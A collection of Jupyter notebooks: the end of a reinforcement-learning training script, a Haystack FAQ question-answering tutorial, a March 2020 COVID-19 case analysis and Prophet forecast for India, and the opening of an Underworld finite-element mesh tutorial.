epsilon_reset_vals[epsilon_reset_at.index(i_episode)] agent.reset_exploration(new_epsilon) new_decay = epsilon_new_decay_rates[epsilon_reset_at.index(i_episode)] if new_decay: agent.epsilon_decay_rate = new_decay if len(scores) > 100: avg_score = np.mean(scores[-100:]) if avg_score > max_avg_score: max_avg_score = avg_score if i_episode % print_every == 0: print("\rEpisode {}/{} | Max Average Score: {} | Current Average Score: {} | Current Alpha: {} | Current Epsilon: {}"\ .format(i_episode, num_episodes, max_avg_score, avg_score, agent.alpha, 
agent.epsilon), end="") sys.stdout.flush() return scores, best_agent # agent.initial_alpha # agent.initial_epsilon alpha_resets = [(1, 0.02, 1.0)] epsilon_resets = [(1, 1.0, get_decay_rate(1.0, 0.00001, 30000))] scores, best_agent = run(agent, env, num_episodes=30000, alpha_resets=alpha_resets, epsilon_resets=epsilon_resets, print_every=10) def plot_scores(scores, rolling_window=100): """Plot scores and optional rolling mean using specified window.""" plt.figure(figsize=(12, 12)); plt.plot(scores); plt.title("Scores"); rolling_mean = pd.Series(scores).rolling(rolling_window).mean() plt.plot(rolling_mean); return rolling_mean rolling_mean = plot_scores(scores) frames_per_second = 30 second_per_frame = 1 / frames_per_second state = env.reset() score = 0 t0 = time.time() while True: action = agent.act(state, mode='test') env.render() state, reward, done, _ = env.step(action) score += reward temporal_time_diff = time.time() - t0 if temporal_time_diff < second_per_frame: time.sleep(second_per_frame - temporal_time_diff) t0 = time.time() if done: break print('Final score:', score) env.close() ``` ---
github_jupyter
# Utilizing existing FAQs for Question Answering [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/deepset-ai/haystack/blob/master/tutorials/Tutorial4_FAQ_style_QA.ipynb) While *extractive Question Answering* works on pure texts and is therefore more generalizable, there's also a common alternative that utilizes existing FAQ data. **Pros**: - Very fast at inference time - Utilize existing FAQ data - Quite good control over answers **Cons**: - Generalizability: We can only answer questions that are similar to existing ones in FAQ In some use cases, a combination of extractive QA and FAQ-style can also be an interesting option. ### Prepare environment #### Colab: Enable the GPU runtime Make sure you enable the GPU runtime to experience decent speed in this tutorial. **Runtime -> Change Runtime type -> Hardware accelerator -> GPU** <img src="https://raw.githubusercontent.com/deepset-ai/haystack/master/docs/_src/img/colab_gpu_runtime.jpg"> ``` # Make sure you have a GPU running !nvidia-smi # Install the latest release of Haystack in your own environment #! pip install farm-haystack # Install the latest master of Haystack !pip install grpcio-tools==1.34.1 !pip install git+https://github.com/deepset-ai/haystack.git from haystack import Finder from haystack.document_store.elasticsearch import ElasticsearchDocumentStore from haystack.retriever.dense import EmbeddingRetriever from haystack.utils import print_answers import pandas as pd import requests ``` ### Start an Elasticsearch server You can start Elasticsearch on your local machine instance using Docker. If Docker is not readily available in your environment (eg., in Colab notebooks), then you can manually download and execute Elasticsearch from source. 
``` # Recommended: Start Elasticsearch using Docker via the Haystack utility function from haystack.utils import launch_es launch_es() # In Colab / No Docker environments: Start Elasticsearch from source ! wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.9.2-linux-x86_64.tar.gz -q ! tar -xzf elasticsearch-7.9.2-linux-x86_64.tar.gz ! chown -R daemon:daemon elasticsearch-7.9.2 import os from subprocess import Popen, PIPE, STDOUT es_server = Popen(['elasticsearch-7.9.2/bin/elasticsearch'], stdout=PIPE, stderr=STDOUT, preexec_fn=lambda: os.setuid(1) # as daemon ) # wait until ES has started ! sleep 30 ``` ### Init the DocumentStore In contrast to Tutorial 1 (extractive QA), we: * specify the name of our `text_field` in Elasticsearch that we want to return as an answer * specify the name of our `embedding_field` in Elasticsearch where we'll store the embedding of our question and that is used later for calculating our similarity to the incoming user question * set `excluded_meta_data=["question_emb"]` so that we don't return the huge embedding vectors in our search results ``` from haystack.document_store.elasticsearch import ElasticsearchDocumentStore document_store = ElasticsearchDocumentStore(host="localhost", username="", password="", index="document", embedding_field="question_emb", embedding_dim=768, excluded_meta_data=["question_emb"]) ``` ### Create a Retriever using embeddings Instead of retrieving via Elasticsearch's plain BM25, we want to use vector similarity of the questions (user question vs. FAQ ones). We can use the `EmbeddingRetriever` for this purpose and specify a model that we use for the embeddings. ``` retriever = EmbeddingRetriever(document_store=document_store, embedding_model="deepset/sentence_bert", use_gpu=True) ``` ### Prepare & Index FAQ data We create a pandas dataframe containing some FAQ data (i.e curated pairs of question + answer) and index those in elasticsearch. 
Here: We download some question-answer pairs related to COVID-19 ``` # Download temp = requests.get("https://raw.githubusercontent.com/deepset-ai/COVID-QA/master/data/faqs/faq_covidbert.csv") open('small_faq_covid.csv', 'wb').write(temp.content) # Get dataframe with columns "question", "answer" and some custom metadata df = pd.read_csv("small_faq_covid.csv") # Minimal cleaning df.fillna(value="", inplace=True) df["question"] = df["question"].apply(lambda x: x.strip()) print(df.head()) # Get embeddings for our questions from the FAQs questions = list(df["question"].values) df["question_emb"] = retriever.embed_queries(texts=questions) df = df.rename(columns={"question": "text"}) # Convert Dataframe to list of dicts and index them in our DocumentStore docs_to_index = df.to_dict(orient="records") document_store.write_documents(docs_to_index) ``` ### Ask questions Initialize a Pipeline (this time without a reader) and ask questions ``` from haystack.pipeline import FAQPipeline pipe = FAQPipeline(retriever=retriever) prediction = pipe.run(query="How is the virus spreading?", top_k_retriever=10) print_answers(prediction, details="all") ``` ## About us This [Haystack](https://github.com/deepset-ai/haystack/) notebook was made with love by [deepset](https://deepset.ai/) in Berlin, Germany We bring NLP to the industry via open source! Our focus: Industry specific language models & large scale QA systems. Some of our other work: - [German BERT](https://deepset.ai/german-bert) - [GermanQuAD and GermanDPR](https://deepset.ai/germanquad) - [FARM](https://github.com/deepset-ai/FARM) Get in touch: [Twitter](https://twitter.com/deepset_ai) | [LinkedIn](https://www.linkedin.com/company/deepset-ai/) | [Slack](https://haystack.deepset.ai/community/join) | [GitHub Discussions](https://github.com/deepset-ai/haystack/discussions) | [Website](https://deepset.ai) By the way: [we're hiring!](https://apply.workable.com/deepset/)
github_jupyter
#COVID-19 - Pandemic in India!

##About COVID-19

The **coronavirus (COVID-19)** pandemic has spread across 190 countries infecting 4.2 lakh people and killing 16,500 so far. In India, as many as 562 COVID-19 cases have been reported so far. Of these, 37 have recovered and 10 have died. On March 24, Prime Minister Narendra Modi announced that the country would go under a 21-day lockdown to combat the spread of the virus. Infections are rapidly rising in Italy, France, Germany, Spain, the United Kingdom and the United States. It has had a massive impact on the global economy and stock markets.

The outbreak of COVID-19 is developing into a major international crisis, and it's starting to influence important aspects of daily life. For example in India:

- **Travel:** Complete lockdown: no domestic or international flights are allowed in India for the next 21 days, as decided by the Ministry of Civil Aviation.
- **Grocery stores:** In highly affected areas, people are starting to stock up on essential goods, leading to shortages of essential supplies.

**Corona Virus Explained in Simple Terms:**

- Let's say Rishav got infected yesterday, but he won't know it until the next 14 days
- Rishav thinks he is healthy but he is infecting 10 persons per day
- Now these 10 persons think they are completely healthy, they travel, go out and infect 100 others
- These 100 persons think they are healthy but they have already infected 1000 persons
- No one knows who is healthy or who can infect you
- All you can do is be responsible, stay in quarantine

##Problem Statement:

It's **25th March Afternoon** and India has reported its **9th** death with **562 total confirmed cases** due to COVID-19. Fresh cases from Manipur, Bihar, Gujarat, and Madhya Pradesh have been reported by the Union Ministry of Health and Family Welfare. 
As the coronavirus outbreak continues to spread in the country, the question that we as Indians are trying to answer is : **"Will India be able to tackle this pandemic or are we going to witness another Italy/ S.Korea/ Wuhan?"** ### Goal: We need a strong model that predicts how the virus could spread across different countries and regions. The goal of this task is to build a model that predicts the spread of the virus in the next 7 days. ###Tasks to be performed: - Analysing the present condition in India - Is this trend similar to Italy/S. Korea/ Wuhan - Exploring the world wide data - Forecasting the world wide COVID-19 cases using Prophet ###Importing the required libraries ``` # importing the required libraries import pandas as pd # Visualisation libraries import matplotlib.pyplot as plt %matplotlib inline import seaborn as sns import plotly.express as px import plotly.graph_objects as go import folium from folium import plugins # Manipulating the default plot size plt.rcParams['figure.figsize'] = 10, 12 # Disable warnings import warnings warnings.filterwarnings('ignore') ``` # Part 1: Analysing the present condition in India **How it started in India?:** The first **COVID-19** case was reported on 30th January 2020 when a student arrived **Kerala** from Wuhan. Just in next 2 days, Kerela reported 2 more cases. For almost a month, no new cases were reported in India, however, on 2nd March 2020, five new cases of corona virus were reported in Kerala again and since then the cases have been rising affecting **25** states, till now *(Bihar and Manipur being the most recent)*. ##Recent COVID-19 cases in India: PM Modi Speech - 24th March - **PM Narendra Modi** declared a three-week nationwide lockdown starting midnight Tuesday, explaining that it was the only way of breaking the Covid-19 infection cycle. 
- Modi told people to **stay inside** their homes for **21 days**, warning that if they didn’t do so the country would be set back 21 years and families would be destroyed. - Modi later issued an appeal to the public to **stop panic buying** as people began crowding markets to stock up before the midnight deadline. - The government also issued a notification that said **all essential services will remain open**, as before, and **all essential commodities and medicines would be available**. Banks, ATMs, petrol pumps, hospitals and grocery shops will continue to function. - **All transport services** — air, rail and roadways — will **remain suspended** until April 14. ## 1.1 Reading the Datasets ``` #Read a .xls file by creating a dataframe using pandas # Reading the datasets df= pd.read_excel('/Covid cases in India (1).xlsx') df_india = df.copy() df # Coordinates of India States and Union Territories India_coord = pd.read_excel('/Indcor (3).xlsx') #Day by day data of India, Korea, Italy and Wuhan dbd_India = pd.read_excel('/per_day_cases.xlsx',parse_dates=True, sheet_name='India') dbd_Italy = pd.read_excel('/per_day_cases.xlsx',parse_dates=True, sheet_name="Italy") dbd_Korea = pd.read_excel('/per_day_cases.xlsx',parse_dates=True, sheet_name="Korea") dbd_Wuhan = pd.read_excel('/per_day_cases.xlsx',parse_dates=True, sheet_name="Wuhan") ``` ## 1.2 Analysing COVID19 Cases in India ``` #Playing around with the dataframe and create a new attribute of 'Total Case' #Total case is the total number of confirmed cases (Indian National + Foreign National) df.drop(['S. 
No.'],axis=1,inplace=True) df['Total cases'] = df['Total Confirmed cases (Indian National)'] + df['Total Confirmed cases ( Foreign National )'] total_cases = df['Total cases'].sum() print('Total number of confirmed COVID 2019 cases across India till date (22nd March, 2020):', total_cases) #Highlight the dataframe df.style.background_gradient(cmap='Blues') #Darker the Blue Greater is the fatality ``` **Visualization Inference:** * Manipur and Mizoram reports thier first case. * Kerela has crossed Maharashtra in terms of highest number of confirmed cases. * Haryana and Telengana has the highest count of confirmed Foreign National count. * Till 25th of March 9 people have died in India * Kerala, Maharashtra, and karnataka are currently TOP 3 states with maximum number of confirmed cases ## 1.3 Number of Active COVID-19 cases in affected State/Union Territories ``` #Total Active -> No. of people Hospitalised #Total Active is the Total cases - (Number of death + Cured) df['Total Active'] = df['Total cases'] - (df['Death'] + df['Cured']) total_active = df['Total Active'].sum() print('Total number of active COVID 2019 cases across India:', total_active) Tot_Cases = df.groupby('Name of State/UT')['Total Active'].sum().sort_values(ascending=False).to_frame() Tot_Cases.style.background_gradient(cmap='Reds') ``` ## 1.4 Visualising the spread geographically ``` #Using folium to create a zoomable map df_full = pd.merge(India_coord,df,on='Name of State/UT') map = folium.Map(location=[20, 70], zoom_start=4,tiles='Stamenterrain') for lat, lon, value, name in zip(df_full['lat'], df_full['lng'], df_full['Total cases'], df_full['Name of State/UT']): folium.CircleMarker([lat, lon], radius=value*0.8, popup = ('<strong>State</strong>: ' + str(name).capitalize() + '<br>''<strong>Total Cases</strong>: ' + str(value) + '<br>'),color='pink',fill_color='red',fill_opacity=0.3 ).add_to(map) map ``` ## 1.5 Confirmed vs Recovered figures ``` #using Seaborn for visualization f, ax = 
plt.subplots(figsize=(12, 8)) data = df_full[['Name of State/UT','Total cases','Cured','Death']] data.sort_values('Total cases',ascending=False,inplace=True) sns.set_color_codes("pastel") sns.barplot(x="Total cases", y="Name of State/UT", data=data,label="Total", color="b") sns.set_color_codes("muted") sns.barplot(x="Cured", y="Name of State/UT", data=data, label="Cured", color="g") # Add a legend and informative axis label ax.legend(ncol=2, loc="lower right", frameon=True) ax.set(xlim=(0, 35), ylabel="",xlabel="Cases") sns.despine(left=True, bottom=True) #Total cases are in blue and cured cases are green ``` ## 1.6 How the Coronavirus cases are rising? ``` #This cell's code is required when you are working with plotly on colab import plotly plotly.io.renderers.default = 'colab' #create interactive graphs using plotly # import plotly.graph_objects as go # Rise of COVID-19 cases in India fig = go.Figure() fig.add_trace(go.Scatter(x=dbd_India['Date'], y = dbd_India['Total Cases'], mode='lines+markers',name='Total Cases')) fig.update_layout(title_text='Trend of Coronavirus Cases in India (Cumulative cases)',plot_bgcolor='rgb(255, 215, 139)') fig.show() # New COVID-19 cases reported daily in India import plotly.express as px fig = px.bar(dbd_India, x="Date", y="New Cases", barmode='group', height=400) fig.update_layout(title_text='Coronavirus Cases in India on daily basis',plot_bgcolor='rgb(128, 230, 230)') fig.show() ``` # Part 2: Is the trend similar to Italy/ S.Korea/ Wuhan? India has already crossed 562 cases. It is very important to contain the situation in the coming 21 days.The numbers of coronavirus patients starting doubling after these countries hit the 100 mark and almost starting increasing exponentially. 
## 2.1 Cumulative cases in India, Italy, S.Korea, and Wuhan ``` # import plotly.express as px fig = px.bar(dbd_India, x="Date", y="Total Cases", color='Total Cases', orientation='v', height=600, title='Confirmed Cases in India', color_discrete_sequence = px.colors.cyclical.IceFire) fig.update_layout(plot_bgcolor='rgb(255, 215, 230)') fig.show() fig = px.bar(dbd_Italy, x="Date", y="Total Cases", color='Total Cases', orientation='v', height=600, title='Confirmed Cases in Italy', color_discrete_sequence = px.colors.cyclical.IceFire) fig.update_layout(plot_bgcolor='rgb(255, 215, 230)') fig.show() fig = px.bar(dbd_Korea, x="Date", y="Total Cases", color='Total Cases', orientation='v', height=600, title='Confirmed Cases in South Korea', color_discrete_sequence = px.colors.cyclical.IceFire) fig.update_layout(plot_bgcolor='rgb(255, 215, 230)') fig.show() fig = px.bar(dbd_Wuhan, x="Date", y="Total Cases", color='Total Cases', orientation='v', height=600, title='Confirmed Cases in Wuhan', color_discrete_sequence = px.colors.cyclical.IceFire) fig.update_layout(plot_bgcolor='rgb(255, 215, 230)') fig.show() ``` ###Visualization Inference - Confirmed cases in India is rising exponentially with no fixed pattern (Very less test in India) - Confirmed cases in Italy is rising exponentially with certain fixed pattern - Confirmed cases in S.Korea is rising gradually - There has been only 3 confirmed cases in Wuhan since last week. They have almost controlled the COVID-19 ###Recent Updates from Wuhan - China on Tuesday decided to lift the three-month lockdown on more than 56 million people in the central Hubei province. - Bus services began in Wuhan for the first time since January 23 as a bus departed from its terminus at Hankou railway station at 5:25 am on Wednesday - The prolonged lockdown of Hubei's capital Wuhan will end on April 8, lifting the mass quarantine over the city with a population of over 11 million. 
## 2.2 Comparison between the rise of cases in Wuhan, S.Korea, Italy and India ``` #Create subplots using plotly # import plotly.graph_objects as go from plotly.subplots import make_subplots fig = make_subplots( rows=2, cols=2, specs=[[{}, {}], [{"colspan": 2}, None]], subplot_titles=("S.Korea", "Italy", "India", "Wuhan")) fig.add_trace(go.Bar(x=dbd_Korea['Date'], y=dbd_Korea['Total Cases'], marker=dict(color=dbd_Korea['Total Cases'], coloraxis="coloraxis")),1, 1) fig.add_trace(go.Bar(x=dbd_Italy['Date'], y=dbd_Italy['Total Cases'], marker=dict(color=dbd_Italy['Total Cases'], coloraxis="coloraxis")),1, 2) fig.add_trace(go.Bar(x=dbd_India['Date'], y=dbd_India['Total Cases'], marker=dict(color=dbd_India['Total Cases'], coloraxis="coloraxis")),2, 1) #fig.add_trace(go.Bar(x=dbd_Wuhan['Date'], y=dbd_Wuhan['Total Cases'], #marker=dict(color=dbd_Wuhan['Total Cases'], coloraxis="coloraxis")),2, 2) fig.update_layout(coloraxis=dict(colorscale='Bluered_r'), showlegend=False,title_text="Total Confirmed cases(Cumulative)") fig.update_layout(plot_bgcolor='rgb(255, 215, 230)') fig.show() ``` ## 2.3 Trend after crossing 100 cases ``` # import plotly.graph_objects as go title = 'Main Source for News' labels = ['S.Korea', 'Italy', 'India'] colors = ['rgb(0, 0, 0)', 'rgb(255,0,0)', 'rgb(49,130,189)'] mode_size = [10, 10, 12] line_size = [1, 1, 8] fig = go.Figure() fig.add_trace(go.Scatter(x=dbd_Korea['Days after surpassing 100 cases'], y=dbd_Korea['Total Cases'],mode='lines', name=labels[0], line=dict(color=colors[0], width=line_size[0]), connectgaps=True)) fig.add_trace(go.Scatter(x=dbd_Italy['Days after surpassing 100 cases'], y=dbd_Italy['Total Cases'],mode='lines', name=labels[1], line=dict(color=colors[1], width=line_size[1]), connectgaps=True)) fig.add_trace(go.Scatter(x=dbd_India['Days after surpassing 100 cases'], y=dbd_India['Total Cases'],mode='lines', name=labels[2], line=dict(color=colors[2], width=line_size[2]), connectgaps=True)) annotations = [] 
annotations.append(dict(xref='paper', yref='paper', x=0.5, y=-0.1, xanchor='center', yanchor='top', text='Days after crossing 100 cases ', font=dict(family='Arial', size=12, color='rgb(150,150,150)'), showarrow=False))
fig.update_layout(annotations=annotations,plot_bgcolor='skyblue',yaxis_title='Cumulative cases')
fig.show()
```

**Visualization Inference:**

* The above graph depicts the number of days after the COVID-19 cases crossed 100 vs the total number of cases in each country.
* Both Italy and S.Korea have crossed the mark of 5600 in the next 13 days.
* The number of cases detected (trend) in India is lower compared to Italy and S.Korea

##2.4 Why is India testing so little? [BBC Report](https://www.bbc.com/news/amp/world-asia-india-51922204)

###**Why is a densely populated country with more than a billion people testing so little?**

The official assumption is the disease has still not spread in the community. As early "evidence" health authorities say 826 samples collected from patients suffering from acute respiratory disease from 50 government hospitals across India between 1 and 15 March tested negative for coronavirus. Also, hospitals have not yet reported a spike in admissions of respiratory distress cases. "It is reassuring that at the moment there is no evidence of community outbreak," says Balram Bhargava, director of the Indian Council of Medical Research (ICMR). He believes Mr Ghebreyesus's advice is "premature" for India, and it would only "create more fear, more paranoia and more hype".

**But experts are not so sure.** Many of them believe India is also testing below scale because it fears that its under-resourced and uneven public health system could be swamped by patients. India could be buying time to stock up on testing kits and add isolation and hospital beds. "I know mass testing is not a solution, but our testing appears to be too limited. 
We need to quickly expand to restrict community transmission," K Sujatha Rao, former federal health secretary and author of But Do We Care: India's Health System. **India** has eight doctors per 10,000 people compared to 41 in **Italy** and 71 in **Korea**. It has one state-run hospital for more than 55,000 people. (Private hospitals are out of reach for most people). India has a poor culture of testing, and most people with flu symptoms do not go to doctors and instead try home remedies or go to pharmacies. There's a scarcity of isolation beds, trained nursing staff and medics, and ventilators and intensive care beds. ###India poor testing rate masked coronavirus cases: [Report](https://www.aljazeera.com/news/2020/03/india-poor-testing-rate-masked-coronavirus-cases-200318040314568.html) #Part 3: Exploring World wide data ``` df = pd.read_csv('/covid_19_clean_complete.csv',parse_dates=['Date']) df.rename(columns={'ObservationDate':'Date', 'Country/Region':'Country'}, inplace=True) df_confirmed = pd.read_csv("/time_series_covid19_confirmed_global.csv") df_recovered = pd.read_csv("/time_series_covid19_recovered_global.csv") df_deaths = pd.read_csv("/time_series_covid19_deaths_global.csv") df_confirmed.rename(columns={'Country/Region':'Country'}, inplace=True) df_recovered.rename(columns={'Country/Region':'Country'}, inplace=True) df_deaths.rename(columns={'Country/Region':'Country'}, inplace=True) df_deaths.head() df.head() df2 = df.groupby(["Date", "Country", "Province/State"])[['Date', 'Province/State', 'Country', 'Confirmed', 'Deaths', 'Recovered']].sum().reset_index() df2.head() # Check for India's data df.query('Country=="India"').groupby("Date")[['Confirmed', 'Deaths', 'Recovered']].sum().reset_index() #Overall worldwide Confirmed/ Deaths/ Recovered cases df.groupby('Date').sum().head() ``` ## 3.1 Visualizing: Worldwide NCOVID-19 cases ``` confirmed = df.groupby('Date').sum()['Confirmed'].reset_index() deaths = df.groupby('Date').sum()['Deaths'].reset_index() 
recovered = df.groupby('Date').sum()['Recovered'].reset_index() fig = go.Figure() #Plotting datewise confirmed cases fig.add_trace(go.Scatter(x=confirmed['Date'], y=confirmed['Confirmed'], mode='lines+markers', name='Confirmed',line=dict(color='Blue', width=2))) fig.add_trace(go.Scatter(x=deaths['Date'], y=deaths['Deaths'], mode='lines+markers', name='Deaths', line=dict(color='Red', width=2))) fig.add_trace(go.Scatter(x=recovered['Date'], y=recovered['Recovered'], mode='lines+markers', name='Recovered', line=dict(color='Green', width=2))) fig.update_layout(title='Worldwide NCOVID-19 Cases', xaxis_tickfont_size=14,yaxis=dict(title='Number of Cases')) fig.show() ``` #Part 4: Forecasting Total Number of Cases Worldwide ## Prophet Prophet is open source software released by Facebook’s Core Data Science team. It is available for download on CRAN and PyPI. We use Prophet, a procedure for forecasting time series data based on an additive model where non-linear trends are fit with yearly, weekly, and daily seasonality, plus holiday effects. It works best with time series that have strong seasonal effects and several seasons of historical data. Prophet is robust to missing data and shifts in the trend, and typically handles outliers well. ## Why Prophet? * **Accurate and fast:** Prophet is used in many applications across Facebook for producing reliable forecasts for planning and goal setting. Facebook finds it to perform better than any other approach in the majority of cases. It fit models in [Stan](https://mc-stan.org/) so that you get forecasts in just a few seconds. * **Fully automatic:** Get a reasonable forecast on messy data with no manual effort. Prophet is robust to outliers, missing data, and dramatic changes in your time series. * **Tunable forecasts:** The Prophet procedure includes many possibilities for users to tweak and adjust forecasts. 
You can use human-interpretable parameters to improve your forecast by adding your domain knowledge * **Available in R or Python:** Facebook has implemented the Prophet procedure in R and Python. Both of them share the same underlying Stan code for fitting. You can use whatever language you’re comfortable with to get forecasts. ## References - https://facebook.github.io/prophet/ - https://facebook.github.io/prophet/docs/ - https://github.com/facebook/prophet - https://facebook.github.io/prophet/docs/quick_start.html ``` from fbprophet import Prophet confirmed = df.groupby('Date').sum()['Confirmed'].reset_index() deaths = df.groupby('Date').sum()['Deaths'].reset_index() recovered = df.groupby('Date').sum()['Recovered'].reset_index() ``` The input to Prophet is always a dataframe with two columns: **ds** and **y**. The **ds (datestamp)** column should be of a format expected by Pandas, ideally YYYY-MM-DD for a date or YYYY-MM-DD HH:MM:SS for a timestamp. The y column must be numeric, and represents the measurement we wish to forecast. ``` confirmed.columns = ['ds','y'] #confirmed['ds'] = confirmed['ds'].dt.date confirmed['ds'] = pd.to_datetime(confirmed['ds']) confirmed.tail() ``` ##4.1 Forecasting Confirmed NCOVID-19 Cases Worldwide with Prophet (Base model) Generating a week ahead forecast of confirmed cases of NCOVID-19 using Prophet, with 95% prediction interval by creating a base model with no tweaking of seasonality-related parameters and additional regressors. ``` m = Prophet(interval_width=0.95) m.fit(confirmed) future = m.make_future_dataframe(periods=7) future.tail() ``` The **predict** method will assign each row in future a predicted value which it names **yhat**. If you pass in historical dates, it will provide an in-sample fit. The **forecast object** here is a new dataframe that includes a column yhat with the forecast, as well as columns for components and uncertainty intervals. 
``` #predicting the future with date, and upper and lower limit of y value forecast = m.predict(future) forecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail() ``` You can plot the forecast by calling the Prophet.plot method and passing in your forecast dataframe. ``` confirmed_forecast_plot = m.plot(forecast) confirmed_forecast_plot =m.plot_components(forecast) ``` ## What do you think was the reason behind calling Janta Curfew on 22nd March and country lockdown from 24th March till next 21 days? - **PM Modi** announced Janta Curfew in India on 22nd March. From 24th March there is a complete lockdown the entire country. Definately its for our own good. ![alt text](https://i.imgur.com/bP2Rf9b.png) - No scheduled international commercial flight's paasenger shall be allowed to land in india from March 22 for a week. - From 24th midnight all the domestic and international flights have been called off. ![alt text](https://i.imgur.com/P9z3TVL.png) ##4.2 Forecasting Worldwide Deaths using Prophet (Base model) Generating a week ahead forecast of confirmed cases of NCOVID-19 using Prophet, with 95% prediction interval by creating a base model with no tweaking of seasonality-related parameters and additional regressors. ``` deaths.columns = ['ds','y'] deaths['ds'] = pd.to_datetime(deaths['ds']) m = Prophet(interval_width=0.95) m.fit(deaths) future = m.make_future_dataframe(periods=7) future.tail() forecast = m.predict(future) forecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail() deaths_forecast_plot = m.plot(forecast) deaths_forecast_plot = m.plot_components(forecast) ``` ##4.3 Forecasting Worldwide Recovered Cases with Prophet (Base model) Generating a week ahead forecast of confirmed cases of NCOVID-19 using Prophet, with 95% prediction interval by creating a base model with no tweaking of seasonality-related parameters and additional regressors. 
``` recovered.columns = ['ds','y'] recovered['ds'] = pd.to_datetime(recovered['ds']) m = Prophet(interval_width=0.95) m.fit(recovered) future = m.make_future_dataframe(periods=7) future.tail() forecast = m.predict(future) forecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail() recovered_forecast_plot = m.plot(forecast) recovered_forecast_plot = m.plot_components(forecast) ``` ##4.4 Inference from the above Analysis and Forecast ###Will Indian become the next Italy/ S.Korea/ Wuhan? Yes, if you look at the world's data and its forecast you can say that India might face one of its worst days if we are not taking strict measures against COVID-19. ###**A Humble Request to all Indians, please TEST, TEST, TEST: COVID-19** Don't take your cough and cold lighly as before. If you look at the data number of cases in India is rising but not like in Italy, Wuhan, S.Korea, Spain, or USA. Don't get fool by these numbers (COVID cases in India). I think the number is less because of low awareness and less tests being conducted in India. Currently India is a deadly and risky zone as there are very few COVID-19 test centres in India. Imagine how many infected people are still around you and are infecting others unknowingly. Remember **India ranks 145** in terms of global healthcare rank while [Italy is on 2nd](https://worldpopulationreview.com/countries/best-healthcare-in-the-world/). - Indian government's decision for today confirms that the above prediction is definitely something we pay attention to. - Please stay home/indoors for all 21 days. This will definitely help us tackle the situation. It won't stop the pandemic, but it would definitely help us reduce the exponential rate at which it is increasing. - Let's give a hand in fighting this pandemic atleast by quarantining ourselves by staying indoors and protecting you and your family. - Go and get a checkup done in case you are suffering from cough,cold, fever, shortness of breath and breathing difficulties. 
Can't tell for sure (due to lack of data), but it might be possible that we don't have the exact number of COVID-19 cases in India because sometimes it takes weeks to see the first sign/symptom of it.

- If you're not getting the checkup done, you might aid in spreading the virus unintentionally
- It's time we take this pandemic seriously - **LIVE & HELP OTHERS LIVE**
- Take precautions, stay indoors, and utilize this time to develop your machine learning skills.

### Indian streets today!

![alt text](https://i.imgur.com/jIE1kro.jpg)

- Nature is sending us a message with the coronavirus pandemic and the ongoing climate crisis, according to the UN’s environment chief, Inger Andersen.
- Think on the positive side: this lockdown will help the environment to heal, reduce different kinds of pollution, and improve air quality

#**Data Source:**
- https://www.mohfw.gov.in/
- https://www.kaggle.com/sudalairajkumar/novel-corona-virus-2019-dataset
github_jupyter
# The Finite Element Mesh The finite element mesh is a fundamental construct for Underworld models. This notebook will go through different examples of what can be done with Underworld's mesh object. #### Overview: 1. Creating, visualising and accessing a mesh object. 2. Modifing a mesh. 3. Loading and saving meshes. **Keywords:** meshes, mesh geometry, loading data **References** 1. Moresi, L., Dufour, F., Muhlhaus, H.B., 2002. Mantle convection modeling with viscoelastic/brittle lithosphere: Numerical methodology and plate tectonic modeling. Pure Appl. Geophys. 159 (10), 2335–2356. 2. Moresi, L., Dufour, F., Muhlhaus, H.B., 2003. A Lagrangian integration point finite element method for large deformation modeling of viscoelastic geomaterials. J. Comput. Phys. 184, 476–497. 3. Moresi, L., Quenette, S., Lemiale, V., Meriaux, C., Appelbe, B., Muhlhaus, H.-B., 2007. Computational approaches to studying non-linear dynamics of the crust and mantle. Physics of the Earth and Planetary Interiors 163, 69–82. ``` import underworld as uw import glucifer ``` ## Creating, visualising and accessing a mesh object ``` # create an 8x8 rectalinear element mesh # range x:[0.0,2.0], y:[0.0,1.0] mesh = uw.mesh.FeMesh_Cartesian( elementType = ("Q1"), elementRes = (8, 8), minCoord = (0.0, 0.0), maxCoord = (2.0, 1.0) ) # visualising the result figMesh = glucifer.Figure(figsize=(1200,600)) figMesh.append( glucifer.objects.Mesh(mesh, nodeNumbers=True) ) figMesh.show() # The meshes' node geometry data can be directly read via numpy arrays `mesh.data` node_id = 1 print "Coordinate of mesh point {} is {}". 
format(node_id, mesh.data[node_id]) # Sets of node indexes that define boundaries are contained under the `mesh.specialSets` dictionary print mesh.specialSets.keys() # The left vertical wall is defined 'MinI_VertexSet' print mesh.specialSets['MinI_VertexSet'] # The right vertical wall is defined 'MaxI_VertexSet # The upper horizontal wall is defined 'MaxJ_VertexSet # The lower horizontal wall is defined 'MinJ_VertexSet ``` #### Element types The `elementType` input argument for a mesh defines the element shape functions. Shape functions define the polynomial order of finite element mesh. Underworld currently supports these element types: * Q2: quadratic elements * Q1: linear elements * dP1c: discontinuous linear elements. * dQ0: discontinuous constant elements. (i.e. 1 node in the centre of the element) #### Mixed elements The mesh object allow for up to 2 element types to be defined for a single mesh. This is initialised by passing a string to the `elementType` argument of the following form: * Q2/dpc1 * Q2/Q1 * Q1/dQ0 For a definition of finite element naming conventions used in Underworld see [here](https://femtable.org/femtable.pdf) Let us now create a 2D mesh object with mixed elements (for 3D simply add an extra term in the tuples for the ``elementRes``, ``minCoord`` and ``maxCoord``). ``` mesh2 = uw.mesh.FeMesh_Cartesian( elementType = ("Q2/dpc1"), elementRes = (4, 4), minCoord = (0., 0.), maxCoord = (2., 1.)) figMesh2 = glucifer.Figure(figsize=(1200,600)) figMesh2.append( glucifer.objects.Mesh(mesh2.subMesh, nodeNumbers=True) ) figMesh2.append( glucifer.objects.Mesh(mesh2, nodeNumbers=True, segmentsPerEdge=4) ) figMesh2.show() # The mesh data for the 2nd element type can be accessed via the `mesh.subMesh`. print(' Number of mesh points (Total) = {0:2d}'.format(len(mesh2.data))) print(' Number of submesh points = {0:2d}'.format(len(mesh2.subMesh.data))) ``` ## Deforming the mesh By default the mesh data is read only. 
